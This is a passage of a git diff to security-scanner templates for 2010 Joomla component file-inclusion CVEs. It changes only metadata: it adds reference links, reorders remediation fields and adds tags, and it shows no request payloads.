index 9d72d6cee7..d01504ad83 100644
--- a/cves/2010/CVE-2010-0982.yaml
+++ b/cves/2010/CVE-2010-0982.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/10942
     - https://www.cvedetails.com/cve/CVE-2010-0982
+    - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/
+    - http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2010-0982
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0985.yaml b/cves/2010/CVE-2010-0985.yaml
index 5380a21392..bf22a5fe1c 100644
--- a/cves/2010/CVE-2010-0985.yaml
+++ b/cves/2010/CVE-2010-0985.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/10948
     - https://www.cvedetails.com/cve/CVE-2010-0985
+    - http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560
+    - http://www.exploit-db.com/exploits/10948
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2010-0985
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1056.yaml b/cves/2010/CVE-2010-1056.yaml
index 785da305f0..e7acf71db9 100644
--- a/cves/2010/CVE-2010-1056.yaml
+++ b/cves/2010/CVE-2010-1056.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11760
     - https://www.cvedetails.com/cve/CVE-2010-1056
+    - http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/
+    - http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2010-1056
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1081.yaml b/cves/2010/CVE-2010-1081.yaml
index 22ecf2057d..846d1ba7cc 100644
--- a/cves/2010/CVE-2010-1081.yaml
+++ b/cves/2010/CVE-2010-1081.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11511
     - https://www.cvedetails.com/cve/CVE-2010-1081
+    - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2010-1081
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1217.yaml b/cves/2010/CVE-2010-1217.yaml
index cc51307f4b..71b5ad9a37 100644
--- a/cves/2010/CVE-2010-1217.yaml
+++ b/cves/2010/CVE-2010-1217.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11814
     - https://www.cvedetails.com/cve/CVE-2010-1217
+    - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
+    - http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2010-1217
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2010,joomla,lfi,plugin
+  tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml
index c6181997c6..7fc13086f6 100644
--- a/cves/2010/CVE-2010-1219.yaml
+++ b/cves/2010/CVE-2010-1219.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11757
     - https://www.cvedetails.com/cve/CVE-2010-1219
+    - http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952
+    - http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1219
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1302.yaml b/cves/2010/CVE-2010-1302.yaml
index 3b0228cac5..1f25c7cecb 100644
--- a/cves/2010/CVE-2010-1302.yaml
+++ b/cves/2010/CVE-2010-1302.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11978
     - https://www.cvedetails.com/cve/CVE-2010-1302
+    - http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/
+    - http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1302
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi,graph
+  tags: edb,cve,cve2010,joomla,lfi,graph
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml
index c36e99c091..c2e0e955f7 100644
--- a/cves/2010/CVE-2010-1304.yaml
+++ b/cves/2010/CVE-2010-1304.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11998
     - https://www.cvedetails.com/cve/CVE-2010-1304
+    - http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174
+    - http://www.exploit-db.com/exploits/11998
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1304
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi,status
+  tags: cve2010,joomla,lfi,status,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1305.yaml b/cves/2010/CVE-2010-1305.yaml
index 775f47b85a..4250249b6b 100644
--- a/cves/2010/CVE-2010-1305.yaml
+++ b/cves/2010/CVE-2010-1305.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12065
     - https://www.cvedetails.com/cve/CVE-2010-1305
+    - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
+    - http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1305
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml
index 32449fabe6..26928f9d4d 100644
--- a/cves/2010/CVE-2010-1306.yaml
+++ b/cves/2010/CVE-2010-1306.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12058
     - https://www.cvedetails.com/cve/CVE-2010-1306
+    - http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/
+    - http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1306
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml
index 8d4c18d51d..cf39fdc2b2 100644
--- a/cves/2010/CVE-2010-1307.yaml
+++ b/cves/2010/CVE-2010-1307.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12070
     - https://www.cvedetails.com/cve/CVE-2010-1307
+    - http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/
+    - http://www.vupen.com/english/advisories/2010/0806
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1307
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml
index 3683a2bc44..909c451b53 100644
--- a/cves/2010/CVE-2010-1308.yaml
+++ b/cves/2010/CVE-2010-1308.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12066
     - https://www.cvedetails.com/cve/CVE-2010-1308
+    - http://www.vupen.com/english/advisories/2010/0809
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1308
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml
index 34c39e2ec6..059b64aa78 100644
--- a/cves/2010/CVE-2010-1312.yaml
+++ b/cves/2010/CVE-2010-1312.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12077
     - https://www.cvedetails.com/cve/CVE-2010-1312
+    - http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/
+    - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1312
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1313.yaml b/cves/2010/CVE-2010-1313.yaml
index 1b865aa5ac..c0d27ee8d3 100644
--- a/cves/2010/CVE-2010-1313.yaml
+++ b/cves/2010/CVE-2010-1313.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12082
     - https://www.cvedetails.com/cve/CVE-2010-1313
+    - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
+    - http://www.exploit-db.com/exploits/12082
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1313
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml
index 7face0dddc..3958192d98 100644
--- a/cves/2010/CVE-2010-1314.yaml
+++ b/cves/2010/CVE-2010-1314.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12086
     - https://www.cvedetails.com/cve/CVE-2010-1314
+    - http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/
+    - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1314
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,packetstorm,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1315.yaml b/cves/2010/CVE-2010-1315.yaml
index e54b204b14..de359df4af 100644
--- a/cves/2010/CVE-2010-1315.yaml
+++ b/cves/2010/CVE-2010-1315.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11999
     - https://www.cvedetails.com/cve/CVE-2010-1315
+    - http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/
+    - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1315
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1340.yaml b/cves/2010/CVE-2010-1340.yaml
index 8d26fdb4e2..e97e612947 100644
--- a/cves/2010/CVE-2010-1340.yaml
+++ b/cves/2010/CVE-2010-1340.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/33797
     - https://www.cvedetails.com/cve/CVE-2010-1340
+    - http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/
+    - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1340
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1345.yaml b/cves/2010/CVE-2010-1345.yaml
index 4e3a6a9979..fa6ee67ced 100644
--- a/cves/2010/CVE-2010-1345.yaml
+++ b/cves/2010/CVE-2010-1345.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/15453
     - https://www.cvedetails.com/cve/CVE-2010-1345
+    - http://www.exploit-db.com/exploits/11785
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1345
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml
index d41d6ffb05..af0680717a 100644
--- a/cves/2010/CVE-2010-1352.yaml
+++ b/cves/2010/CVE-2010-1352.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12084
     - https://www.cvedetails.com/cve/CVE-2010-1352
+    - http://web.archive.org/web/20140724194110/http://secunia.com/advisories/39357/
+    - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1352
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml
index 3523896e82..73fb8f0020 100644
--- a/cves/2010/CVE-2010-1353.yaml
+++ b/cves/2010/CVE-2010-1353.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12068
     - https://www.cvedetails.com/cve/CVE-2010-1353
+    - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/
+    - http://www.vupen.com/english/advisories/2010/0808
   classification:
     cve-id: CVE-2010-1353
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1354.yaml b/cves/2010/CVE-2010-1354.yaml
index f74519761c..aeef172960 100644
--- a/cves/2010/CVE-2010-1354.yaml
+++ b/cves/2010/CVE-2010-1354.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12102
     - https://www.cvedetails.com/cve/CVE-2010-1354
+    - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt
+    - http://web.archive.org/web/20140724190841/http://secunia.com/advisories/39296/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1354
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1461.yaml b/cves/2010/CVE-2010-1461.yaml
index 7f56edc715..0c6bf1782f 100644
--- a/cves/2010/CVE-2010-1461.yaml
+++ b/cves/2010/CVE-2010-1461.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12232
     - https://www.cvedetails.com/cve/CVE-2010-1461
+    - http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504
+    - http://www.exploit-db.com/exploits/12232
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1461
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi,photo
+  tags: cve,cve2010,joomla,lfi,photo,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1469.yaml b/cves/2010/CVE-2010-1469.yaml
index 5489b65613..be491b5e73 100644
--- a/cves/2010/CVE-2010-1469.yaml
+++ b/cves/2010/CVE-2010-1469.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12146
     - https://www.cvedetails.com/cve/CVE-2010-1469
+    - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt
+    - http://www.exploit-db.com/exploits/12146
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1469
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,packetstorm,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1470.yaml b/cves/2010/CVE-2010-1470.yaml
index d1f197f51e..1d6450b1b8 100644
--- a/cves/2010/CVE-2010-1470.yaml
+++ b/cves/2010/CVE-2010-1470.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12166
     - https://www.cvedetails.com/cve/CVE-2010-1470
+    - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/
+    - http://www.exploit-db.com/exploits/12166
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1470
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1471.yaml b/cves/2010/CVE-2010-1471.yaml
index 2a6b8c6404..0d9df245c0 100644
--- a/cves/2010/CVE-2010-1471.yaml
+++ b/cves/2010/CVE-2010-1471.yaml
@@ -8,10 +8,10 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12170
     - https://www.cvedetails.com/cve/CVE-2010-1471
+    - http://www.vupen.com/english/advisories/2010/0862
   classification:
     cve-id: CVE-2010-1471
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml
index a995b37bb1..a69ad87305 100644
--- a/cves/2010/CVE-2010-1472.yaml
+++ b/cves/2010/CVE-2010-1472.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12167
     - https://www.cvedetails.com/cve/CVE-2010-1472
+    - http://web.archive.org/web/20140723200143/http://secunia.com/advisories/39406/
+    - http://www.exploit-db.com/exploits/12167
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1472
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml
index ab6af01c75..7d81133c22 100644
--- a/cves/2010/CVE-2010-1473.yaml
+++ b/cves/2010/CVE-2010-1473.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12171
     - https://www.cvedetails.com/cve/CVE-2010-1473
+    - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt
+    - http://web.archive.org/web/20140723213338/http://secunia.com/advisories/39410/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1473
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,packetstorm,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml
index 3eb57c4788..ebce5060fb 100644
--- a/cves/2010/CVE-2010-1474.yaml
+++ b/cves/2010/CVE-2010-1474.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12182
     - https://www.cvedetails.com/cve/CVE-2010-1474
+    - http://web.archive.org/web/20140723205926/http://secunia.com/advisories/39388/
+    - http://www.exploit-db.com/exploits/12182
   classification:
     cve-id: CVE-2010-1474
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1475.yaml b/cves/2010/CVE-2010-1475.yaml
index c3148da86e..9d5ab44333 100644
--- a/cves/2010/CVE-2010-1475.yaml
+++ b/cves/2010/CVE-2010-1475.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12147
     - https://www.cvedetails.com/cve/CVE-2010-1475
+    - http://web.archive.org/web/20140723203010/http://secunia.com/advisories/39285/
+    - http://www.exploit-db.com/exploits/12147
   classification:
     cve-id: CVE-2010-1475
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml
index d9f1db1f23..1ae3498a34 100644
--- a/cves/2010/CVE-2010-1476.yaml
+++ b/cves/2010/CVE-2010-1476.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12150
     - https://www.cvedetails.com/cve/CVE-2010-1476
+    - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt
+    - http://www.alphaplug.com/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1476
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,packetstorm,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1478.yaml b/cves/2010/CVE-2010-1478.yaml
index b88ddc77a7..1d8de53169 100644
--- a/cves/2010/CVE-2010-1478.yaml
+++ b/cves/2010/CVE-2010-1478.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12145
     - https://www.cvedetails.com/cve/CVE-2010-1478
+    - http://web.archive.org/web/20140723205157/http://secunia.com/advisories/39262/
+    - http://web.archive.org/web/20210121195422/https://www.securityfocus.com/bid/39390/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1478
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1491.yaml b/cves/2010/CVE-2010-1491.yaml
index 713e23b779..3640e1e37a 100644
--- a/cves/2010/CVE-2010-1491.yaml
+++ b/cves/2010/CVE-2010-1491.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12318
     - https://www.cvedetails.com/cve/CVE-2010-1491
+    - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt
+    - http://web.archive.org/web/20140724060325/http://secunia.com/advisories/39533/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1491
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1494.yaml b/cves/2010/CVE-2010-1494.yaml
index 2060b98972..d8a96ed10f 100644
--- a/cves/2010/CVE-2010-1494.yaml
+++ b/cves/2010/CVE-2010-1494.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12113
     - https://www.cvedetails.com/cve/CVE-2010-1494
+    - http://www.exploit-db.com/exploits/12113
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1494
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml
index 622f71cfea..6e28f8a4fe 100644
--- a/cves/2010/CVE-2010-1495.yaml
+++ b/cves/2010/CVE-2010-1495.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12286
     - https://www.cvedetails.com/cve/CVE-2010-1495
+    - http://www.vupen.com/english/advisories/2010/0929
+    - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1495
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml
index 7741ecdb85..6a0cba1da4 100644
--- a/cves/2010/CVE-2010-1531.yaml
+++ b/cves/2010/CVE-2010-1531.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12054
     - https://www.cvedetails.com/cve/CVE-2010-1531
+    - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1531
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,packetstorm,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1532.yaml b/cves/2010/CVE-2010-1532.yaml
index cd68c205e5..3cfdb1c33b 100644
--- a/cves/2010/CVE-2010-1532.yaml
+++ b/cves/2010/CVE-2010-1532.yaml
@@ -4,15 +4,16 @@ info:
   name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts
-    via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/12118
     - https://www.cvedetails.com/cve/CVE-2010-1532
+    - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt
+    - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1532
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1533.yaml b/cves/2010/CVE-2010-1533.yaml
index 3c56311b21..50a833080d 100644
--- a/cves/2010/CVE-2010-1533.yaml
+++ b/cves/2010/CVE-2010-1533.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12142
     - https://www.cvedetails.com/cve/CVE-2010-1533
+    - http://web.archive.org/web/20140723212810/http://secunia.com/advisories/39258/
+    - http://www.exploit-db.com/exploits/12142
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-1533
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml
index 721940176f..a7222cf33b 100644
--- a/cves/2010/CVE-2010-1534.yaml
+++ b/cves/2010/CVE-2010-1534.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12067
     - https://www.cvedetails.com/cve/CVE-2010-1534
+    - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39213/
+    - http://web.archive.org/web/20140724182459/http://secunia.com/advisories/39352/
+  remediation: Upgrade to a supported version
   classification:
     cve-id: CVE-2010-1534
-  remediation: Upgrade to a supported version
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1535.yaml b/cves/2010/CVE-2010-1535.yaml
index 06d7154eb4..dd182e49a7 100644
--- a/cves/2010/CVE-2010-1535.yaml
+++ b/cves/2010/CVE-2010-1535.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12151
     - https://www.cvedetails.com/cve/CVE-2010-1535
+    - http://web.archive.org/web/20140725030342/http://secunia.com/advisories/39254/
+    - http://www.exploit-db.com/exploits/12151
   classification:
     cve-id: CVE-2010-1535
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml
index afd61d4b4d..7858f54cb4 100644
--- a/cves/2010/CVE-2010-1540.yaml
+++ b/cves/2010/CVE-2010-1540.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11625
     - https://www.cvedetails.com/cve/CVE-2010-1540
+    - http://web.archive.org/web/20140721042709/http://secunia.com/advisories/38777/
+    - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/
   classification:
     cve-id: CVE-2010-1540
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml
index ca4fbf66c0..b02548d3dd 100644
--- a/cves/2010/CVE-2010-1601.yaml
+++ b/cves/2010/CVE-2010-1601.yaml
@@ -8,9 +8,11 @@ info:
   reference:
